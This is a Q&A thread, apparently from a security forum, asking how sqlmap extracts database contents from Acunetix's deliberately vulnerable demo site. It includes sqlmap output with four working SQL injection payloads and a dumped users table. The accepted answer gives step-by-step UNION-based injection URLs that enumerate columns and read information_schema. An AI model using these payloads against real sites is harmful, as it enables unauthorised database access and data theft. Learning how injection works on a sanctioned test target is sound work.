# How sqlmap works to get all database info

Tags: sql-injection, databases, sqlmap

I am curious how sqlmap able to get all the info from the database? I am using burp as proxy to view all the request and response. From the response I couldn't see any information related to the database but the sqlmap able to show the related info. For example if I use sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart -T users --dump --proxy="http://192.168.0.115:8181", I am able to get the records from the acuart db in table users.

**This is the output of sqlmap**

```
[*] starting at 17:55:43

[17:55:43] [INFO] resuming back-end DBMS 'mysql' 
[17:55:48] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: cat (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: cat=1 AND 7494=7494

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: cat=1 AND (SELECT 4839 FROM(SELECT COUNT(*),CONCAT(0x7176627171,(SELECT (CASE WHEN (4839=4839) THEN 1 ELSE 0 END)),0x716a717871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 11 columns
    Payload: cat=1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7176627171,0x616b7441734e6d755964,0x716a717871),NULL,NULL,NULL,NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind (SELECT)
    Payload: cat=1 AND (SELECT * FROM (SELECT(SLEEP(15)))Swtz)
---
[17:55:49] [INFO] the back-end DBMS is MySQL
web application technology: Nginx, PHP 5.3.10
back-end DBMS: MySQL 5.0
[17:55:49] [INFO] fetching columns for table 'users' in database 'acuart'
[17:55:49] [INFO] fetching entries for table 'users' in database 'acuart'
[17:55:49] [INFO] analyzing table dump for possible password hashes
Database: acuart
Table: users
[1 entry]
+---------------------+------------+------+------+-------+---------+-----------------+-----------+
| cc                  | name       | cart | pass | uname | phone   | email           | address   |
+---------------------+------------+------+------+-------+---------+-----------------+-----------+
| 1234-5678-2300-9000 | John Smith | 0    | test | test  | 2323345 | email@email.com | 21 street |
+---------------------+------------+------+------+-------+---------+-----------------+-----------+

[17:55:49] [INFO] table 'acuart.users' dumped to CSV file '/root/.sqlmap/output/testphp.vulnweb.com/dump/acuart/users.csv'
[17:55:49] [INFO] fetched data logged to text files under '/root/.sqlmap/output/testphp.vulnweb.com'

[*] shutting down at 17:55:49
```

**Request From the Proxy:**

```
GET /listproducts.php?cat=1&MkFN%3D4313%20AND%201%3D1%20UNION%20ALL%20SELECT%201%2C2%2C3%2Ctable_name%20FROM%20information_schema.tables%20WHERE%202%3E1--%20..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: sqlmap/1.0-dev-nongit-20150403 (http://sqlmap.org)
Accept-Charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7
Connection: close
Pragma: no-cache
Cache-Control: no-cache,no-store
```

**Response From the Proxy:**

```
HTTP/1.1 200 OK
Server: nginx/1.4.1
Date: Sun, 03 May 2015 13:40:43 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2
Content-Length: 7011

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><!-- InstanceBegin template="/Templates/main_dynamic_template.dwt.php" codeOutsideHTMLIsLocked="false" -->
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-2">

<!-- InstanceBeginEditable name="document_title_rgn" -->
<title>pictures</title>
<!-- InstanceEndEditable -->
<link rel="stylesheet" href="style.css" type="text/css">
<!-- InstanceBeginEditable name="headers_rgn" -->
<!-- InstanceEndEditable -->
<script language="JavaScript" type="text/JavaScript">
<!--
function MM_reloadPage(init) {  //reloads the window if Nav4 resized
  if (init==true) with (navigator) {if ((appName=="Netscape")&&(parseInt(appVersion)==4)) {
    document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }}
  else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload();
}
MM_reloadPage(true);
//-->
</script>

</head>
<body> 
<div id="mainLayer" style="position:absolute; width:700px; z-index:1">
<div id="masthead"> 
  <h1 id="siteName"><a href="http://www.acunetix.com/"><img src="images/logo.gif" width="306" height="38" border="0"></a></h1>   
  <h6 id="siteInfo">TEST and Demonstration site for Acunetix Web Vulnerability Scanner</h6>
  <div id="globalNav"> 
        <table border="0" cellpadding="0" cellspacing="0" width="100%"><tr>
    <td align="left">
        <a href="index.php">home</a> | <a href="categories.php">categories</a> | <a href="artists.php">artists
        </a> | <a href="disclaimer.php">disclaimer</a> | <a href="cart.php">your cart</a> | 
        <a href="guestbook.php">guestbook</a> | 
        <a href="AJAX/index.php">AJAX Demo</a>
    </td>
    <td align="right">
        </td>
    </tr></table>
  </div> 
</div> 
<!-- end masthead --> 

<!-- begin content -->
<!-- InstanceBeginEditable name="content_rgn" -->
<div id="content">
    <h2 id='pageName'>Posters</h2><div class='story'><a href='product.php?pic=1'><h3>The shore</h3></a><p><a href='showimage.php?file=./pictures/1.jpg' target='_blank'><img style='cursor:pointer' border='0' align='left' src='showimage.php?file=./pictures/1.jpg&size=160' width='160' height='100'></a>Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Donec molestie.
Sed aliquam sem ut arcu.</p><p>painted by: <a href='artists.php?artist=1'>r4w8173</a></p><p><a href='#' onClick="window.open('./comment.php?pid=1','comment','width=500,height=400')">comment on this picture</a></p></div><div class='story'><a href='product.php?pic=2'><h3>Mistery</h3></a><p><a href='showimage.php?file=./pictures/2.jpg' target='_blank'><img style='cursor:pointer' border='0' align='left' src='showimage.php?file=./pictures/2.jpg&size=160' width='160' height='100'></a>Donec molestie.
Sed aliquam sem ut arcu.</p><p>painted by: <a href='artists.php?artist=1'>r4w8173</a></p><p><a href='#' onClick="window.open('./comment.php?pid=2','comment','width=500,height=400')">comment on this picture</a></p></div><div class='story'><a href='product.php?pic=3'><h3>The universe</h3></a><p><a href='showimage.php?file=./pictures/3.jpg' target='_blank'><img style='cursor:pointer' border='0' align='left' src='showimage.php?file=./pictures/3.jpg&size=160' width='160' height='100'></a>Lorem ipsum dolor sit amet. Donec molestie.
Sed aliquam sem ut arcu.</p><p>painted by: <a href='artists.php?artist=1'>r4w8173</a></p><p><a href='#' onClick="window.open('./comment.php?pid=3','comment','width=500,height=400')">comment on this picture</a></p></div><div class='story'><a href='product.php?pic=4'><h3>Walking</h3></a><p><a href='showimage.php?file=./pictures/4.jpg' target='_blank'><img style='cursor:pointer' border='0' align='left' src='showimage.php?file=./pictures/4.jpg&size=160' width='160' height='100'></a>Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Donec molestie.
Sed aliquam sem ut arcu. Phasellus sollicitudin.
</p><p>painted by: <a href='artists.php?artist=1'>r4w8173</a></p><p><a href='#' onClick="window.open('./comment.php?pid=4','comment','width=500,height=400')">comment on this picture</a></p></div><div class='story'><a href='product.php?pic=5'><h3>Mean</h3></a><p><a href='showimage.php?file=./pictures/5.jpg' target='_blank'><img style='cursor:pointer' border='0' align='left' src='showimage.php?file=./pictures/5.jpg&size=160' width='160' height='100'></a>Lorem ipsum dolor sit amet, consectetuer adipiscing elit.</p><p>painted by: <a href='artists.php?artist=1'>r4w8173</a></p><p><a href='#' onClick="window.open('./comment.php?pid=5','comment','width=500,height=400')">comment on this picture</a></p></div><div class='story'><a href='product.php?pic=7'><h3>Trees</h3></a><p><a href='showimage.php?file=./pictures/7.jpg' target='_blank'><img style='cursor:pointer' border='0' align='left' src='showimage.php?file=./pictures/7.jpg&size=160' width='160' height='100'></a>bla bla bla</p><p>painted by: <a href='artists.php?artist=2'>Blad3</a></p><p><a href='#' onClick="window.open('./comment.php?pid=7','comment','width=500,height=400')">comment on this picture</a></p></div></div>
<!-- InstanceEndEditable -->
<!--end content -->

<div id="navBar"> 
  <div id="search"> 
    <form action="search.php?test=query" method="post"> 
      <label>search art</label> 
      <input name="searchFor" type="text" size="10"> 
      <input name="goButton" type="submit" value="go"> 
    </form> 
  </div> 
  <div id="sectionLinks"> 
    <ul> 
      <li><a href="categories.php">Browse categories</a></li> 
      <li><a href="artists.php">Browse artists</a></li> 
      <li><a href="cart.php">Your cart</a></li> 
      <li><a href="login.php">Signup</a></li>
      <li><a href="userinfo.php">Your profile</a></li>
      <li><a href="guestbook.php">Our guestbook</a></li>
        <li><a href="AJAX/index.php">AJAX Demo</a></li>
      </li> 
    </ul> 
  </div> 
  <div class="relatedLinks"> 
    <h3>Links</h3> 
    <ul> 
      <li><a href="http://www.acunetix.com">Security art</a></li> 
      <li><a href="http://www.eclectasy.com/Fractal-Explorer/index.html">Fractal Explorer</a></li> 
    </ul> 
  </div> 
  <div id="advert"> 
    <p>
      <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0" width="107" height="66">
        <param name="movie" value="Flash/add.swf">
        <param name=quality value=high>
        <embed src="Flash/add.swf" quality=high pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash" type="application/x-shockwave-flash" width="107" height="66"></embed>
      </object>
    </p>
  </div> 
</div> 

<!--end navbar --> 
<div id="siteInfo">  <a href="http://www.acunetix.com">About Us</a> | <a href="privacy.php">Privacy Policy</a> | <a href="mailto:wvs@acunetix.com">Contact Us</a> | &copy;2006
  Acunetix Ltd 
</div> 
<br> 
</div>
</body>
<!-- InstanceEnd --></html>
```

Your explanation is very much appreciated. Thank you.

Comment: What [exploitation technique](https://github.com/sqlmapproject/sqlmap/wiki/Techniques) does it use?

Comment: Hi @Gumbo, I just updated the question with the output for your references.

Comment: So which of the mentioned techniques does it actually use for retrieval? Which payload pattern do you see in your proxy?

Comment: Hi @ Gumbo, from my understanding, the sqlmap is injecting "1&MkFN%3D4313%20AND%201%3D1%20UNION%20ALL%20SELECT%201%2C2%2C3%2Ctable_name%20FROM%20information_schema.tables%20WHERE%202%3E1--%20..%2F..%2F..%2Fetc%2Fpasswd" as payload in the parameter cat which can found from the request packet shown in question.

Comment: Since it’s doing a UNION query, you should be able to see the additionally selected data in the response.

Comment: Yes, I doubt so but I am not able to see it through the response packet. I think I have some mistake, cause when I try to issue another command `sqlmap -u "http://testphp.vulnweb.com/listproducts.php?cat=1" --dbs --proxy="http://192.168.0.113:8181"` I get back the exactly same request packet. I doubt that it is not only issue http request. Am I correct?

Comment: I suppose the `r4w8173` in your example response is something sqlmap used to see which column gets reflected in the output.

Answer (score 3, accepted):

There seems to be something wrong with the request you posted.
Since the vulnerable parameter is the "cat" parameter the "&" in your request separates the payload from the vulnerable parameter thus resulting in no information being revealed.

**Let us do it right:**

A request for:

http://testphp.vulnweb.com/listproducts.php?cat=1%20AND%201=1%20UNION%20ALL%20SELECT%201,2,3,4%20from%20information_schema.tables--%20-

reveals an error message stating that the number of columns is different from the number in the original query.

> Error: The used SELECT statements have a different number of columns

By increasing the number of columns (adding comma-separated numbers) until the message disappears we determine that the number of columns must be 11.

That is because the request for the following will result in a valid page:

http://testphp.vulnweb.com/listproducts.php?cat=1%20AND%201=1%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,11%20from%20information_schema.tables--%20-

We see that a number of items was added to our page. The numbers 7, 2 and 9 are easily visible in each of the items. If we replace one of them with the information we want to receive (table_name from information_schema.tables) we get the information you were looking for:

http://testphp.vulnweb.com/listproducts.php?cat=1%20AND%201=1%20UNION%20ALL%20SELECT%201,table_name,3,4,5,6,7,8,9,10,11%20from%20information_schema.tables--%20-

(The users table is in the last item)

The same spots can be used to extract all the other info you are looking for. You just modify the column you want to receive and the table the data is in.

Comment: Thank you for you details explanation and example provided. It really helps me a lot. Thank you very much.

Answer (score 1):

This thread is quite old, but for all those who want to know how sqlmap is working, use -v6 (verbosity level 6) while running sqlmap command.